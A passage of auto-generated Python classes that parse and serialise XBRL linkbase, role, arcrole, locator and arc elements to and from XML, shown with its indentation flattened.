def replace_extended_at(self, index, value): self.extended[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.documentation or
self.roleRef or
self.arcroleRef or
self.extended
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='linkbase', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='linkbase')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='linkbase', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='linkbase'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='linkbase', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for roleRef_ in self.roleRef:
roleRef_.export(outfile, level, namespace_='link:', name_='roleRef', pretty_print=pretty_print)
for arcroleRef_ in self.arcroleRef:
arcroleRef_.export(outfile, level, namespace_='link:', name_='arcroleRef', pretty_print=pretty_print)
for extended_ in self.extended:
extended_.export(outfile, level, namespace_, name_='extended', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'roleRef':
obj_ = roleRef.factory()
obj_.build(child_)
self.roleRef.append(obj_)
obj_.original_tagname_ = 'roleRef'
elif nodeName_ == 'arcroleRef':
obj_ = arcroleRef.factory()
obj_.build(child_)
self.arcroleRef.append(obj_)
obj_.original_tagname_ = 'arcroleRef'
elif nodeName_ == 'extended':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <extended> element')
self.extended.append(obj_)
obj_.original_tagname_ = 'extended'
elif nodeName_ == 'presentationLink':
obj_ = presentationLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'presentationLink'
elif nodeName_ == 'definitionLink':
obj_ = definitionLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'definitionLink'
elif nodeName_ == 'calculationLink':
obj_ = calculationLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'calculationLink'
elif nodeName_ == 'labelLink':
obj_ = labelLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'labelLink'
elif nodeName_ == 'referenceLink':
obj_ = referenceLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'referenceLink'
elif nodeName_ == 'footnoteLink':
obj_ = footnoteLink.factory()
obj_.build(child_)
self.extended.append(obj_)
obj_.original_tagname_ = 'footnoteLink'
# end class linkbase
class linkbaseRef(GeneratedsSuper):
"""Definition of the linkbaseRef element - used to link to XBRL
taxonomy extended links from taxonomy schema documents and from
XBRL instances. This attribute must have the value:
http://www.w3.org/1999/xlink/properties/linkbase"""
subclass = None
superclass = None
def __init__(self, arcrole=None):
self.original_tagname_ = None
self.arcrole = _cast(None, arcrole)
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if linkbaseRef.subclass:
return linkbaseRef.subclass(*args_, **kwargs_)
else:
return linkbaseRef(*args_, **kwargs_)
factory = staticmethod(factory)
def get_arcrole(self): return self.arcrole
def set_arcrole(self, arcrole): self.arcrole = arcrole
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='linkbaseRef', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='linkbaseRef')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='linkbaseRef', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='linkbaseRef'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.arcrole is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
outfile.write(' arcrole=%s' % (self.gds_format_string(quote_attrib(self.arcrole).encode(ExternalEncoding), input_name='arcrole'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='linkbaseRef', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('arcrole', node)
if value is not None and 'arcrole' not in already_processed:
already_processed.add('arcrole')
self.arcrole = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class linkbaseRef
class roleType(GeneratedsSuper):
"""The roleType element definition - used to define custom role values
in XBRL extended links."""
subclass = None
superclass = None
def __init__(self, roleURI=None, id=None, definition=None, usedOn=None):
self.original_tagname_ = None
self.roleURI = _cast(None, roleURI)
self.id = _cast(None, id)
self.definition = definition
if usedOn is None:
self.usedOn = []
else:
self.usedOn = usedOn
def factory(*args_, **kwargs_):
if roleType.subclass:
return roleType.subclass(*args_, **kwargs_)
else:
return roleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_definition(self): return self.definition
def set_definition(self, definition): self.definition = definition
def get_usedOn(self): return self.usedOn
def set_usedOn(self, usedOn): self.usedOn = usedOn
def add_usedOn(self, value): self.usedOn.append(value)
def insert_usedOn_at(self, index, value): self.usedOn.insert(index, value)
def replace_usedOn_at(self, index, value): self.usedOn[index] = value
def get_roleURI(self): return self.roleURI
def set_roleURI(self, roleURI): self.roleURI = roleURI
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.definition is not None or
self.usedOn
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='roleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='roleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='roleType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='roleType'):
if self.roleURI is not None and 'roleURI' not in already_processed:
already_processed.add('roleURI')
outfile.write(' roleURI=%s' % (quote_attrib(self.roleURI), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='roleType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.definition is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdefinition>%s</%sdefinition>%s' % (namespace_, self.gds_format_string(quote_xml(self.definition).encode(ExternalEncoding), input_name='definition'), namespace_, eol_))
for usedOn_ in self.usedOn:
showIndent(outfile, level, pretty_print)
outfile.write('<%susedOn>%s</%susedOn>%s' % (namespace_, self.gds_format_string(quote_xml(usedOn_).encode(ExternalEncoding), input_name='usedOn'), namespace_, eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('roleURI', node)
if value is not None and 'roleURI' not in already_processed:
already_processed.add('roleURI')
self.roleURI = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'definition':
definition_ = child_.text
definition_ = self.gds_validate_string(definition_, node, 'definition')
self.definition = definition_
elif nodeName_ == 'usedOn':
usedOn_ = child_.text
usedOn_ = self.gds_validate_string(usedOn_, node, 'usedOn')
self.usedOn.append(usedOn_)
# end class roleType
class arcroleType(GeneratedsSuper):
"""The arcroleType element definition - used to define custom arc role
values in XBRL extended links."""
subclass = None
superclass = None
def __init__(self, arcroleURI=None, id=None, cyclesAllowed=None, definition=None, usedOn=None):
self.original_tagname_ = None
self.arcroleURI = _cast(None, arcroleURI)
self.id = _cast(None, id)
self.cyclesAllowed = _cast(None, cyclesAllowed)
self.definition = definition
if usedOn is None:
self.usedOn = []
else:
self.usedOn = usedOn
def factory(*args_, **kwargs_):
if arcroleType.subclass:
return arcroleType.subclass(*args_, **kwargs_)
else:
return arcroleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_definition(self): return self.definition
def set_definition(self, definition): self.definition = definition
def get_usedOn(self): return self.usedOn
def set_usedOn(self, usedOn): self.usedOn = usedOn
def add_usedOn(self, value): self.usedOn.append(value)
def insert_usedOn_at(self, index, value): self.usedOn.insert(index, value)
def replace_usedOn_at(self, index, value): self.usedOn[index] = value
def get_arcroleURI(self): return self.arcroleURI
def set_arcroleURI(self, arcroleURI): self.arcroleURI = arcroleURI
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_cyclesAllowed(self): return self.cyclesAllowed
def set_cyclesAllowed(self, cyclesAllowed): self.cyclesAllowed = cyclesAllowed
def hasContent_(self):
if (
self.definition is not None or
self.usedOn
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='arcroleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcroleType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcroleType'):
if self.arcroleURI is not None and 'arcroleURI' not in already_processed:
already_processed.add('arcroleURI')
outfile.write(' arcroleURI=%s' % (quote_attrib(self.arcroleURI), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.cyclesAllowed is not None and 'cyclesAllowed' not in already_processed:
already_processed.add('cyclesAllowed')
outfile.write(' cyclesAllowed=%s' % (quote_attrib(self.cyclesAllowed), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcroleType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.definition is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sdefinition>%s</%sdefinition>%s' % (namespace_, self.gds_format_string(quote_xml(self.definition).encode(ExternalEncoding), input_name='definition'), namespace_, eol_))
for usedOn_ in self.usedOn:
showIndent(outfile, level, pretty_print)
outfile.write('<%susedOn>%s</%susedOn>%s' % (namespace_, self.gds_format_string(quote_xml(usedOn_).encode(ExternalEncoding), input_name='usedOn'), namespace_, eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('arcroleURI', node)
if value is not None and 'arcroleURI' not in already_processed:
already_processed.add('arcroleURI')
self.arcroleURI = value
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('cyclesAllowed', node)
if value is not None and 'cyclesAllowed' not in already_processed:
already_processed.add('cyclesAllowed')
self.cyclesAllowed = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'definition':
definition_ = child_.text
definition_ = self.gds_validate_string(definition_, node, 'definition')
self.definition = definition_
elif nodeName_ == 'usedOn':
usedOn_ = child_.text
usedOn_ = self.gds_validate_string(usedOn_, node, 'usedOn')
self.usedOn.append(usedOn_)
# end class arcroleType
class documentationType(GeneratedsSuper):
"""Element type to use for documentation of extended links and
linkbases."""
subclass = None
superclass = None
def __init__(self, valueOf_=None):
self.original_tagname_ = None
self.valueOf_ = valueOf_
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if documentationType.subclass:
return documentationType.subclass(*args_, **kwargs_)
else:
return documentationType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='documentationType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='documentationType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='documentationType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='documentationType'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='documentationType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class documentationType
class titleType(GeneratedsSuper):
"""Type for the abstract title element - used as a title element
template."""
subclass = None
superclass = None
def __init__(self, type_=None):
self.original_tagname_ = None
self.type_ = _cast(None, type_)
def factory(*args_, **kwargs_):
if titleType.subclass:
return titleType.subclass(*args_, **kwargs_)
else:
return titleType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def hasContent_(self):
if (
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='titleType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='titleType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='titleType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='titleType'):
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='titleType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class titleType
class locatorType(GeneratedsSuper):
"""Generic locator type."""
subclass = None
superclass = None
def __init__(self, title_attr=None, label=None, href=None, role=None, type_=None, title=None):
self.original_tagname_ = None
self.title_attr = _cast(None, title_attr)
self.label = _cast(None, label)
self.href = _cast(None, href)
self.role = _cast(None, role)
self.type_ = _cast(None, type_)
if title is None:
self.title = []
else:
self.title = title
def factory(*args_, **kwargs_):
if locatorType.subclass:
return locatorType.subclass(*args_, **kwargs_)
else:
return locatorType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_title_attr(self): return self.title_attr
def set_title_attr(self, title_attr): self.title_attr = title_attr
def get_label(self): return self.label
def set_label(self, label): self.label = label
def get_href(self): return self.href
def set_href(self, href): self.href = href
def get_role(self): return self.role
def set_role(self, role): self.role = role
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def hasContent_(self):
if (
self.title
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='locatorType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='locatorType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='locatorType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='locatorType'):
if self.title_attr is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
outfile.write(' title=%s' % (self.gds_format_string(quote_attrib(self.title_attr).encode(ExternalEncoding), input_name='title_attr'), ))
if self.label is not None and 'label' not in already_processed:
already_processed.add('label')
outfile.write(' label=%s' % (quote_attrib(self.label), ))
if self.href is not None and 'href' not in already_processed:
already_processed.add('href')
outfile.write(' href=%s' % (quote_attrib(self.href), ))
if self.role is not None and 'role' not in already_processed:
already_processed.add('role')
outfile.write(' role=%s' % (self.gds_format_string(quote_attrib(self.role).encode(ExternalEncoding), input_name='role'), ))
if self.type_ is not None and 'type_' not in already_processed:
already_processed.add('type_')
outfile.write(' type=%s' % (self.gds_format_string(quote_attrib(self.type_).encode(ExternalEncoding), input_name='type'), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='locatorType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('title', node)
if value is not None and 'title_attr' not in already_processed:
already_processed.add('title_attr')
self.title_attr = value
value = find_attr_value_('label', node)
if value is not None and 'label' not in already_processed:
already_processed.add('label')
self.label = value
value = find_attr_value_('href', node)
if value is not None and 'href' not in already_processed:
already_processed.add('href')
self.href = value
value = find_attr_value_('role', node)
if value is not None and 'role' not in already_processed:
already_processed.add('role')
self.role = value
value = find_attr_value_('type', node)
if value is not None and 'type' not in already_processed:
already_processed.add('type')
self.type_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
# end class locatorType
class arcType(GeneratedsSuper):
"""basic extended link arc type - extended where necessary for specific
arcs Extends the generic arc type by adding use, priority and
order attributes."""
subclass = None
superclass = None
def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, extensiontype_=None):
self.original_tagname_ = None
self.use = _cast(None, use)
self.from_ = _cast(None, from_)
self.title_attr = _cast(None, title_attr)
self.show = _cast(None, show)
self.arcrole = _cast(None, arcrole)
self.actuate = _cast(None, actuate)
self.priority = _cast(None, priority)
self.to = _cast(None, to)
self.type_ = _cast(None, type_)
self.order = _cast(None, order)
if title is None:
self.title = []
else:
self.title = title
self.anyAttributes_ = {}
self.extensiontype_ = extensiontype_
def factory(*args_, **kwargs_):
if arcType.subclass:
return arcType.subclass(*args_, **kwargs_)
else:
return arcType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_use(self): return self.use
def set_use(self, use): self.use = use
def get_from(self): return self.from_
def set_from(self, from_): self.from_ = from_
def get_title_attr(self): return self.title_attr
def set_title_attr(self, title_attr): self.title_attr = title_attr
def get_show(self): return self.show
def set_show(self, show): self.show = show
def get_arcrole(self): return self.arcrole
def set_arcrole(self, arcrole): self.arcrole = arcrole
def get_actuate(self): return self.actuate
def set_actuate(self, actuate): self.actuate = actuate
def get_priority(self): return self.priority
def set_priority(self, priority): self.priority = priority
def get_to(self): return self.to
def set_to(self, to): self.to = to
def get_type(self): return self.type_
def set_type(self, type_): self.type_ = type_
def get_order(self): return self.order
def set_order(self, order): self.order = order
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def get_extensiontype_(self): return self.extensiontype_
def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
def hasContent_(self):
if (
self.title
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='arcType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcType'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
